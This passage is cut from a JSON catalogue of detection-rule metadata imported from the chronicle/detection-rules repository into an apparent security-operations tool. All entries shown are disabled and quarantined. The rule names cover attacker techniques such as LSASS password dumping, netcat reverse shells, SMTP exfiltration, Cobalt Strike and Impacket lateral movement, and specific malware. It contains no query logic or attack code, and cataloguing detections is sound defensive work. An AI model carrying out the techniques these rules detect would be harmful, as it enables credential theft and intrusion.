"chronicle/detection-rules", "source_id": "onelogin_otp_brute_force_attack", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/onelogin/onelogin_otp_brute_force_attack.yaral" } }, { "id": "chronicle-detection-rules-onelogin-super-user-privileges-assigned", "type": "detection", "name": "onelogin_super_user_privileges_assigned", "description": "onelogin_super_user_privileges_assigned", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/onelogin-super-user-privileges-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "onelogin_super_user_privileges_assigned", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/onelogin/onelogin_super_user_privileges_assigned.yaral" } }, { "id": "chronicle-detection-rules-onelogin-user-authentication-factor-removed", "type": "detection", "name": "onelogin_user_authentication_factor_removed", "description": "onelogin_user_authentication_factor_removed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/onelogin-user-authentication-factor-removed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "onelogin_user_authentication_factor_removed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/onelogin/onelogin_user_authentication_factor_removed.yaral" } }, { "id": "chronicle-detection-rules-onelogin-user-logins-from-multiple-countries", "type": "detection", "name": "onelogin_user_logins_from_multiple_countries", "description": "onelogin_user_logins_from_multiple_countries", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/onelogin-user-logins-from-multiple-countries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "onelogin_user_logins_from_multiple_countries", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/onelogin/onelogin_user_logins_from_multiple_countries.yaral" } }, { "id": "chronicle-detection-rules-oracle-weblogic-exploit", "type": "detection", "name": "oracle_weblogic_exploit", "description": "oracle_weblogic_exploit", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/oracle-weblogic-exploit.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "oracle_weblogic_exploit", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/webserver/oracle_weblogic_exploit.yaral" } }, { "id": "chronicle-detection-rules-password-dumper-activity-on-lsass", "type": "detection", "name": "password_dumper_activity_on_lsass", "description": "password_dumper_activity_on_lsass", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/password-dumper-activity-on-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "password_dumper_activity_on_lsass", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/password_dumper_activity_on_lsass.yaral" } }, { "id": "chronicle-detection-rules-password-dumper-remote-thread-in-lsass", "type": "detection", "name": "password_dumper_remote_thread_in_lsass", "description": "password_dumper_remote_thread_in_lsass", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/password-dumper-remote-thread-in-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "password_dumper_remote_thread_in_lsass", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/password_dumper_remote_thread_in_lsass.yaral" } }, { "id": "chronicle-detection-rules-password-stealer-pwdfetcher-detector-sysmon", "type": "detection", "name": "password_stealer_pwdfetcher_detector_sysmon", "description": "password_stealer_pwdfetcher_detector_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/password-stealer-pwdfetcher-detector-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "password_stealer_pwdfetcher_detector_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/password_stealer__pwdfetcher__detector__sysmon.yaral" } }, { "id": "chronicle-detection-rules-pax-dism-wim-mount-via-cmdline", "type": "detection", "name": "pax_dism_wim_mount_via_cmdline", "description": "pax_dism_wim_mount_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/pax-dism-wim-mount-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "pax_dism_wim_mount_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/pax_dism_wim_mount__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-paymen45-ransomware", "type": "detection", "name": "paymen45_ransomware", "description": "paymen45_ransomware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/paymen45-ransomware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "paymen45_ransomware", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/paymen45_ransomware.yaral" } }, { "id": "chronicle-detection-rules-persistence-of-ryuk-ransomware", "type": "detection", "name": "persistence_of_ryuk_ransomware", "description": "persistence_of_ryuk_ransomware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/persistence-of-ryuk-ransomware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "persistence_of_ryuk_ransomware", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/persistence_of_ryuk_ransomware.yaral" } }, { "id": "chronicle-detection-rules-phishing-campaign-using-zoom-invites", "type": "detection", "name": "phishing_campaign_using_zoom_invites", "description": "phishing_campaign_using_zoom_invites", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/phishing-campaign-using-zoom-invites.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "phishing_campaign_using_zoom_invites", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/phishing_campaign_using_zoom_invites.yaral" } }, { "id": "chronicle-detection-rules-phorpiex-malware-detector-sysmon-behavior-august-2019", "type": "detection", "name": "phorpiex_malware_detector_sysmon_behavior_august_2019", "description": "phorpiex_malware_detector_sysmon_behavior_august_2019", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/phorpiex-malware-detector-sysmon-behavior-august-2019.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "phorpiex_malware_detector_sysmon_behavior_august_2019", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/phorpiex_malware_detector__sysmon_behavior___august_2019.yaral" } }, { "id": "chronicle-detection-rules-poetrat-pythonrat-uses-covid19-lure", "type": "detection", "name": "poetrat_pythonrat_uses_covid19_lure", "description": "poetrat_pythonrat_uses_covid19_lure", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/poetrat-pythonrat-uses-covid19-lure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "poetrat_pythonrat_uses_covid19_lure", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/poetrat;_pythonrat_uses_covid_19_lure.yaral" } }, { "id": "chronicle-detection-rules-pony-malware-sysmon", "type": "detection", "name": "pony_malware_sysmon", "description": "pony_malware_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/pony-malware-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "pony_malware_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/pony_malware__sysmon.yaral" } }, { "id": "chronicle-detection-rules-port-proxy-forwarding-t1090-cisa-report", "type": "detection", "name": "port_proxy_forwarding_T1090_cisa_report", "description": "port_proxy_forwarding_T1090_cisa_report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/port-proxy-forwarding-t1090-cisa-report.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "port_proxy_forwarding_T1090_cisa_report", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/port_proxy_forwarding_T1090_cisa_report.yaral" } }, { "id": "chronicle-detection-rules-possible-abusing-ads", "type": "detection", "name": "possible_abusing_ads", "description": "possible_abusing_ads", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-abusing-ads.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_abusing_ads", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/microsoft_sysmon/possible_abusing_ads.yaral" } }, { "id": "chronicle-detection-rules-possible-anything-cpl-or-anything-dll-hijack-via-imageload", "type": "detection", "name": "possible_anything_cpl_or_anything_dll_hijack__via_imageload", "description": "possible_anything_cpl_or_anything_dll_hijack__via_imageload", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-anything-cpl-or-anything-dll-hijack-via-imageload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_anything_cpl_or_anything_dll_hijack__via_imageload", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/image_load/possible_anything_cpl_or_anything_dll_hijack__via_imageload.yaral" } }, { "id": "chronicle-detection-rules-possible-applocker-bypass", "type": "detection", "name": "possible_applocker_bypass", "description": "possible_applocker_bypass", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-applocker-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_applocker_bypass", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/possible_applocker_bypass.yaral" } }, { "id": "chronicle-detection-rules-possible-bind-or-reverse-shell-via-netcat-auditbeat-for-linux", "type": "detection", "name": "possible_bind_or_reverse_shell_via_netcat_auditbeat_for_linux", "description": "possible_bind_or_reverse_shell_via_netcat_auditbeat_for_linux", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-bind-or-reverse-shell-via-netcat-auditbeat-for-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_bind_or_reverse_shell_via_netcat_auditbeat_for_linux", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/linux/possible_bind_or_reverse_shell_via_netcat__auditbeat_for_linux.yaral" } }, { "id": "chronicle-detection-rules-possible-cc-traffic-from-malware-variants", "type": "detection", "name": "possible_cc_traffic_from_malware_variants", "description": "possible_cc_traffic_from_malware_variants", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-cc-traffic-from-malware-variants.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_cc_traffic_from_malware_variants", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/possible_c_c_traffic_from_malware_variants.yaral" } }, { "id": "chronicle-detection-rules-possible-cobaltstrike-psexec-filenames-via-audit", "type": "detection", "name": "possible_cobaltstrike_psexec_filenames_via_audit", "description": "possible_cobaltstrike_psexec_filenames_via_audit", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-cobaltstrike-psexec-filenames-via-audit.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_cobaltstrike_psexec_filenames_via_audit", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/possible_cobaltstrike_psexec_filenames__via_audit_part_1.yaral" } }, { "id": "chronicle-detection-rules-possible-cobaltstrike-psexec-filenames-via-audit-part-1", "type": "detection", "name": "possible_cobaltstrike_psexec_filenames_via_audit_part_1", "description": "possible_cobaltstrike_psexec_filenames_via_audit_part_1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-cobaltstrike-psexec-filenames-via-audit-part-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_cobaltstrike_psexec_filenames_via_audit_part_1", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/possible_cobaltstrike_psexec_filenames__via_audit_part_2.yaral" } }, { "id": "chronicle-detection-rules-possible-credential-in-files-execution-sysmon-behavior", "type": "detection", "name": "possible_credential_in_files_execution_sysmon_behavior", "description": "possible_credential_in_files_execution_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-credential-in-files-execution-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_credential_in_files_execution_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/possible_credential_in_files_execution__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-possible-data-exfiltration-via-smtp", "type": "detection", "name": "possible_data_exfiltration_via_smtp", "description": "possible_data_exfiltration_via_smtp", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-data-exfiltration-via-smtp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_data_exfiltration_via_smtp", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/possible_data_exfiltration_via_smtp.yaral" } }, { "id": "chronicle-detection-rules-possible-execution-from-volume-shadow-copy", "type": "detection", "name": "possible_execution_from_volume_shadow_copy", "description": "possible_execution_from_volume_shadow_copy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-execution-from-volume-shadow-copy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_execution_from_volume_shadow_copy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/possible_execution_from_volume_shadow_copy.yaral" } }, { "id": "chronicle-detection-rules-possible-f5-bigip-tmui-attack-cve20205902", "type": "detection", "name": "possible_f5_bigip_tmui_attack_cve20205902", "description": "possible_f5_bigip_tmui_attack_cve20205902", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-f5-bigip-tmui-attack-cve20205902.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_f5_bigip_tmui_attack_cve20205902", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/big_ip/possible_f5_big_ip_tmui_attack_cve_2020_5902_part_1.yaral" } }, { "id": "chronicle-detection-rules-possible-f5-bigip-tmui-attack-cve20205902-part-1", "type": "detection", "name": "possible_f5_bigip_tmui_attack_cve20205902_part_1", "description": "possible_f5_bigip_tmui_attack_cve20205902_part_1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-f5-bigip-tmui-attack-cve20205902-part-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_f5_bigip_tmui_attack_cve20205902_part_1", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/big_ip/possible_f5_big_ip_tmui_attack_cve_2020_5902_part_2.yaral" } }, { "id": "chronicle-detection-rules-possible-flash-0day-execute-embedded-in-word-document-sysmon", "type": "detection", "name": "possible_flash_0day_execute_embedded_in_word_document_sysmon", "description": "possible_flash_0day_execute_embedded_in_word_document_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-flash-0day-execute-embedded-in-word-document-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_flash_0day_execute_embedded_in_word_document_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/sysmon/possible_flash_0day_execute_embedded_in_word_document___sysmon.yaral" } }, { "id": "chronicle-detection-rules-possible-hpcustpartuidll-hijack-via-imageload", "type": "detection", "name": "possible_hpcustpartuidll_hijack_via_imageload", "description": "possible_hpcustpartuidll_hijack_via_imageload", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-hpcustpartuidll-hijack-via-imageload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_hpcustpartuidll_hijack_via_imageload", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/image_load/possible_hpcustpartui_dll_hijack__via_imageload.yaral" } }, { "id": "chronicle-detection-rules-possible-impacketobfuscation-wmiexec-or-smbexec-utility-via-cmdline", "type": "detection", "name": "possible_impacketobfuscation_wmiexec_or_smbexec_utility_via_cmdline", "description": "possible_impacketobfuscation_wmiexec_or_smbexec_utility_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-impacketobfuscation-wmiexec-or-smbexec-utility-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_impacketobfuscation_wmiexec_or_smbexec_utility_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/possible_impacket_obfuscation_wmiexec_or_smbexec_utility__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-possible-libvlcdll-hijack-via-imageload", "type": "detection", "name": "possible_libvlcdll_hijack_via_imageload", "description": "possible_libvlcdll_hijack_via_imageload", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-libvlcdll-hijack-via-imageload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_libvlcdll_hijack_via_imageload", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/image_load/possible_libvlc_dll_hijack__via_imageload.yaral" } }, { "id": "chronicle-detection-rules-possible-malicious-use-of-mshtaexe-detector-sysmon-behavior", "type": "detection", "name": "possible_malicious_use_of_mshtaexe_detector_sysmon_behavior", "description": "possible_malicious_use_of_mshtaexe_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", 